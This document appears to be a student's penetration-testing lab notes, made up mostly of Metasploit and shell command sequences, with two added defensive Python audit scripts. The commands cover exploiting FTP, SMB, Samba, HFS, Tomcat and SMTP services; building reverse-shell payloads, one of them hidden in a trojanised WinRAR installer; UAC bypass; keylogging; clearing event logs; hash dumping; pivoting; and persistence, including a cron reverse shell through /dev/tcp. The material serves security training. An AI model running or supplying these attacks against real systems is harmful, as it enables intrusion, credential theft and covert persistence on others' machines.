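Added example (not from these notes) covering both the cron section above and this SUID section: a Python audit that parses `ls -l` and /etc/crontab text to list setuid binaries and to flag root cron jobs whose script or input file a non-root user can modify, plus any job whose command opens /dev/tcp/. The listing and crontab are constructed.

```python
"""
Audit two privilege-escalation paths the notes describe: cron jobs run by
root that execute or process files a non-root user can modify, and setuid
binaries. Works from `ls -l` and /etc/crontab text so it can be run offline
on collected output. Added example; the listing and crontab are constructed.
"""
import re
import shlex

# `ls -l` line: mode [.+] links owner group size month day time|year name
LS_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})[.+]?\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$")

# Constructed `ls -l` output for the paths a cron audit touches
SAMPLE_LS = """\
-rwsr-xr-x 1 root    root    16712 Jan 12 10:14 /home/student/welcome
-rwxrwxrwx 1 root    root       67 Jan 12 10:20 /usr/local/share/copy.sh
-rwxr-xr-x 1 root    root      120 Jan 12 10:21 /usr/local/bin/backup.sh
-rw-r--r-- 1 student student     0 Jan 12 10:22 /home/student/message
"""

# Constructed /etc/crontab content (system format: 5 time fields + user)
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
* * * * * root /usr/local/share/copy.sh
*/5 * * * * root /usr/local/bin/backup.sh /home/student/message
* * * * * student /bin/bash -c 'bash -i >& /dev/tcp/10.10.23.2/1234 0>&1'
"""


def parse_ls_l(listing: str) -> dict:
    """Map path -> (mode string, owner, group) from `ls -l <paths>` output."""
    entries = {}
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            entries[m.group(4)] = (m.group(1), m.group(2), m.group(3))
    return entries


def is_setuid(mode: str) -> bool:
    return mode[3] in "sS"          # owner execute slot carries the setuid bit


def is_world_writable(mode: str) -> bool:
    return mode[8] == "w"           # "other" write slot


def setuid_binaries(entries: dict) -> list:
    """Paths with the setuid bit, i.e. run with the owner's privileges."""
    return sorted(p for p, (mode, _, _) in entries.items() if is_setuid(mode))


def parse_system_crontab(text: str) -> list:
    """Return (user, command) pairs from /etc/crontab-style lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                # blank, comment or VAR=value line
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def risky_cron_jobs(crontab_text: str, entries: dict) -> list:
    """
    Return (user, command, reason). A root job is risky when any absolute
    path it references is world-writable or owned by a non-root user; any
    job whose command opens /dev/tcp/ is flagged as a reverse-shell pattern.
    """
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if "/dev/tcp/" in cmd:
            findings.append((user, cmd, "command opens /dev/tcp/ (reverse shell)"))
        if user != "root":
            continue
        for tok in shlex.split(cmd):
            info = entries.get(tok) if tok.startswith("/") else None
            if info is None:
                continue
            mode, owner, _ = info
            if is_world_writable(mode):
                findings.append((user, cmd, f"{tok} is world-writable"))
            elif owner != "root":
                findings.append((user, cmd, f"{tok} is owned by {owner}"))
    return findings


if __name__ == "__main__":
    fs = parse_ls_l(SAMPLE_LS)
    print("setuid:", setuid_binaries(fs))
    for user, cmd, reason in risky_cron_jobs(SAMPLE_CRONTAB, fs):
        print(f"[{user}] {cmd}\n    -> {reason}")
```

On a live host, generate the listing with `ls -l` over the paths named in the crontab (and `find / -perm -4000 -type f` for the setuid list) and pass both texts in; every finding is a file whose permissions or ownership should be tightened.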
> whoami
> groups <user>
> ls -la
> file welcome
> strings welcome
> rm greetings
> cp /bin/bash greetings
> ./welcome
> cat /etc/shadow
Dumping Linux Password Hashes#
- Prefix:
- $1 → MD5
- $2 → Blowfish
- $5 → SHA-256
- $6 → SHA-512
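Added example (not from these notes): a Python script that classifies each /etc/shadow entry by its prefix and lists accounts with weak or empty password storage. In addition to the prefixes above it recognises the bcrypt variants $2a$/$2b$/$2y$ and yescrypt ($y$), which current Debian and Ubuntu releases use by default. The shadow lines are constructed placeholders.

```python
"""
Classify the hash algorithm of every /etc/shadow entry from its $id$ prefix
and report accounts whose password storage is weak (empty field, MD5-crypt,
legacy DES). Added example; the shadow lines are constructed with placeholder
salts and hashes. Besides the prefixes in the notes it recognises the bcrypt
variants $2a$/$2b$/$2y$ and yescrypt ($y$).
"""

# $id$ -> algorithm, per crypt(5); "Blowfish" follows the notes' naming
HASH_PREFIXES = {
    "1": "MD5", "2": "Blowfish", "2a": "Blowfish", "2b": "Blowfish",
    "2y": "Blowfish", "5": "SHA-256", "6": "SHA-512", "y": "yescrypt",
}
WEAK = {"MD5", "DES", "EMPTY"}

# Constructed shadow entries; salts and hashes are placeholders
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$placeholderhashvalue:19700:0:99999:7:::
student:$1$abc$placeholderhash:19700:0:99999:7:::
deploy:$y$j9T$saltsaltsaltsaltsaltsa$placeholderhashvalue:19700:0:99999:7:::
backup::19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
sshd:!:19700:0:99999:7:::
"""


def classify_hash(field: str) -> str:
    """Name the algorithm behind one shadow password field."""
    if field == "":
        return "EMPTY"                         # no password needed to log in
    if field[0] in "!*":
        return "LOCKED"                        # password login disabled
    if field.startswith("$"):
        hash_id = field.split("$")[1]          # "$6$salt$hash" -> "6"
        return HASH_PREFIXES.get(hash_id, f"unknown(${hash_id}$)")
    if len(field) == 13:
        return "DES"                           # traditional 13-char crypt(3)
    return "unrecognised"


def parse_shadow(text: str) -> dict:
    """Map username -> algorithm name for every entry in shadow-file text."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        result[fields[0]] = classify_hash(fields[1])
    return result


def weak_accounts(text: str) -> list:
    """Usernames whose password storage should be fixed, sorted."""
    return sorted(u for u, algo in parse_shadow(text).items() if algo in WEAK)


if __name__ == "__main__":
    for user, algo in parse_shadow(SAMPLE_SHADOW).items():
        print(f"{user:10} {algo}")
    print("weak:", weak_accounts(SAMPLE_SHADOW))
```

An empty second field is the worst case (no password at all), and an MD5-crypt entry like the one `openssl passwd -1` produces is a sign that an account was set or reset outside the distribution's normal tooling; both belong in the weak list.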
> nmap -sV <IP>
> searchsploit proftpd
> setg RHOSTS <IP>
> search proftpd
> use exploit/unix/ftp/proftpd_133c_backdoor
> show options
> set payload payload/cmd/unix/reverse
> exploit
> /bin/bash -i
> id
> // Go in background
> sessions
> sessions -u 1
> sysinfo
> getuid
> cat /etc/shadow
// Get hash
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> run
// Crack hash
> use auxiliary/analyze/crack_linux
> set SHA512 true
> run
Network-Based Attacks#
Firewall Detection & IDS Evasion#
> nmap -Pn -sS -F <IP> // -F -> Fast Scan
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets
SMB & NetBIOS Enumeration#
- NetBIOS → API & a set of network protocols providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
- SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources.
> cat /etc/hosts
> ping demo.ine.local // reachable IP1
> ping demo1.ine.local // not reachable IP2
> nmap demo.ine.local
> nbtscan
> whatis nbtscan
> nbtscan <IP/Subnet>
> nbtscan
> nmblookup -A <IP1>
> nmap -sU -p 137 <IP1>
> nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
> nmap -sV -p 139,445 demo.ine.local
> ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
> nmap -p445 --script smb-protocols demo.ine.local
> nmap -p445 --script smb-security-mode demo.ine.local
> smbclient -L demo.ine.local // testing for anonymous access -> press enter
> nmap -p445 --script smb-enum-users demo.ine.local
> nano users.txt // enter all usernames
> hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
> psexec.py administrator@demo.ine.local
> whoami
// MSF
> search psexec
> use exploit/windows/smb/psexec
> set SMBUser <username>
> set SMBPass <password>
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
> sysinfo
> shell
> ping <IP2> // Exit
> run autoroute -s <IP2/Subnet> // /20 -> Meterpreter
> background
> search socks
> use auxiliary/server/socks_proxy
> set VERSION 4a // cat /etc/proxychains4.conf
> set SRVPORT <ProxychainPort>
> run
> netstat -antp
// Machine 1
> proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
// MSF
> shell
> net view <IP2>
> background
> migrate -N explorer.exe
> shell
> net view <IP2>
> net use D: \\<IP2>\Documents
> net use K: \\<IP2>\K$
> dir D:
SNMP Enumeration#
> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
SMB Relay Attack#
- It is a type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions
> search smb_relay
> use exploit/windows/smb/smb_relay
> set SRVHOST <IP> // Kali Linux IP - ifconfig
> set LHOST <IP> // Kali Linux IP - ifconfig
> set SMBHOST <IP> // Check lab docs
// New Tab
> echo "<Kali-IP> *.sportsfoo" > dns
> dnsspoof -i eth1 -f dns
MSFVenom#
> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx64.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf
// SHELLCODE
// -i -> Iterations
// -e -> Encoding
// -x -> Inject in file
// -k -> Keep original behavior of file (ex. winrar.exe)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe
// MSF Scripts
> msfconsole -r handler.rc
HTTP File Server (HFS)#
> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session
Apache Tomcat Java Server#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp
> set LHOST & LPORT
> set SHELL cmd
> exploit
> background
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe > meterpreter.exe
> sudo python -m SimpleHTTPServer 80
> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir // Continue
> nano handler.rc
> use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <Kali-IP>
> set LPORT 1234
> run
// Save the file
> msfconsole -r handler.rc
> .\meterpreter.exe // Resume after running handler.rc
> sysinfo
> getuid
FTP Server#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd_234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST <kali-ip>
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
SAMBA : File Sharing Service#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check if it's vulnerable
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
SSH#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> sessions 1
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
SMTP#
> setg RHOSTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1
Meterpreter#
> edit flag1 // Text Editor
> download flag1
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Running Processes
> migrate <pid>
> sessions -u 1 // Upgrade shell to Meterpreter session
Windows Post Exploitation#
Modules#
> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list process
> migrate <pid>
> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Store results in DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run
UAC Bypass#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump
Token Impersonation With Incognito#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <>
> getuid
Windows Persistence#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K
> use multi/handler
> set LHOST eth1
> run
Enabling RDP#
> use exploit/windows/http/badblue_passthru
> set RHOSTS
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell
> net user administrator hacker_123321 // Change Password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>
Windows Keylogging#
> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump
Clearing Windows Event Logs#
> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes Event Logs
Windows Pivoting#
> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is from same subnet : Victim 2
> run autoroute -s <IP>/<range> (Range-20)
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
> portfwd add -l 1234 -p 80 -r <Victim-2-Ip>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-Ip>
> set LPORT 4433
> exploit
> sysinfo
Linux Post Exploitation#
Post-Exploitation Modules#
> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r
> uname -a
> ifconfig
> ip a s
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1
> search enum_configs
> set SESSION <Meterpreter>
> run
> loot
> search env platform:linux
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> set SESSION <id>
> run
> search checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> set SESSION <id>
> run
Linux Privilege Escalation#
> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1
> pwd
> whoami
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> bash
> ps aux
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> search chkrootkit
> show options
> set CHKROOTKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i
Dumping Hashes with Hashdump#
> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i
Establishing Persistence on Linux#
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOST eth1
> set LPORT <>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit
> loot
> cat private_key.txt // use from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>
Exploitation#
Banner Grabbing#
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>
Nmap Vulnerability Scanning#
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>
Post Exploitation#
Methodology#
- Local Enumeration
- Transferring Files
- Upgrading Shells
- Privilege Escalation
- Persistence
- Dumping & Cracking Hashes
- Pivoting
- Clearing Tracks
Windows#
Enum Users & Groups#
> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes
> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches
Linux#
Enum#
> useradd bob -s /bin/bash
> github.com/rebootuser/LinEnum
Windows Priv Escalation#
> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
// Copy & paste the generated command into the Windows cmd prompt
> whoami
> background
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit
Linux Priv Escalation#
// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow // Remove * & paste the hash
> su
// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l
> sudo man cat
> !/bin/bash
Linux Persistence#
// Via SSH Keys
> ssh student@<IP> // password:password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_keys
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password:password
> rm wait
> ssh -i id_rsa student@<IP>
// Via Cron Jobs
> ssh student@<IP> // password:password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron
> crontab cron
> crontab -l
> rm wait
> nc -nvlp 1234